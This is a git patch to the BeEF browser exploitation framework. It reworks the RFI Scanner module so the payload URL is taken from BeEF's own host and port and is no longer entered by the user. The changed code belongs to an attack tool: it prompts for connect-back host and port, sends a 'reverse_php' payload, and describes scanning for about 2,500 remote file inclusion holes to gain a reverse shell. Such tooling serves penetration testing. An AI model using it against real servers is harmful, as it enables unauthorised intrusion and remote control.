From 1318ccf019d9228febdcae044269f5e1a8fd4fec Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Tue, 20 Jan 2015 12:18:50 +0000
Subject: [PATCH] remove payload url

---
 .../media/javascript/ui/panel/tabs/ZombieTabNetwork.js        | 3 +--
 modules/exploits/rfi_scanner/command.js                       | 2 +-
 modules/exploits/rfi_scanner/config.yaml                      | 2 +-
 modules/exploits/rfi_scanner/module.rb                        | 4 ----
 4 files changed, 3 insertions(+), 8 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
index 49ad129c2..b2b8266c7 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
@@ -436,12 +436,11 @@ ZombieTab_Network = function(zombie) {
                                                                 var mod_id = get_module_id("rfi_scanner");
                                                                 var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
                                                                 var lport = prompt("Enter local port for connect back shell:", 'LPORT');
-                                                                var payload_url = prompt("Enter BeEF server URL:", 'http://beef_host:beef_port/');
 								alert("Now start your reverse shell handler on " + lhost + ':' + lport);
                                                                 commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
                                                                 $jwterm.ajax({
                                                                         contentType: 'application/json',
-                                                                        data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload_url":payload_url, "payload":"reverse_php"}),
+                                                                        data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
                                                                         dataType: 'json',
                                                                         type: 'POST',
                                                                         url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
diff --git a/modules/exploits/rfi_scanner/command.js b/modules/exploits/rfi_scanner/command.js
index 9c2170421..05d6240b7 100644
--- a/modules/exploits/rfi_scanner/command.js
+++ b/modules/exploits/rfi_scanner/command.js
@@ -10,7 +10,7 @@ beef.execute(function() {
   var rhost = '<%= @rhost %>'; 
   var rport = '<%= @rport %>';
   var base_dir = '<%= @base_dir %>';
-  var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
+  var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
   var target = rproto + '://' + rhost + ':' + rport + base_dir;
   var wait = '<%= @wait %>';
 
diff --git a/modules/exploits/rfi_scanner/config.yaml b/modules/exploits/rfi_scanner/config.yaml
index c0e52770a..5252a4f2b 100644
--- a/modules/exploits/rfi_scanner/config.yaml
+++ b/modules/exploits/rfi_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Exploits"
             name: "RFI Scanner"
-            description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.</br><br/>This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
+            description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]
diff --git a/modules/exploits/rfi_scanner/module.rb b/modules/exploits/rfi_scanner/module.rb
index 83d5ab4ad..70c22fa64 100644
--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -149,11 +149,8 @@ EOS
   
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-		beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
                 lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
                 lhost = "" if lhost == "0.0.0.0"
-		url = "#{proto}://#{lhost}:#{beef_port}"
 		return [
 			{ 'name' => 'rproto',
 				'type' => 'combobox',
@@ -173,7 +170,6 @@ EOS
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 
 			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
 			{ 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
-			{ 'name' => 'payload_url', 'ui_label' => 'BeEF server URL',  'value' => url },
 			{ 'name' => 'payload',
 				'type' => 'combobox',
 				'ui_label' => 'Payload',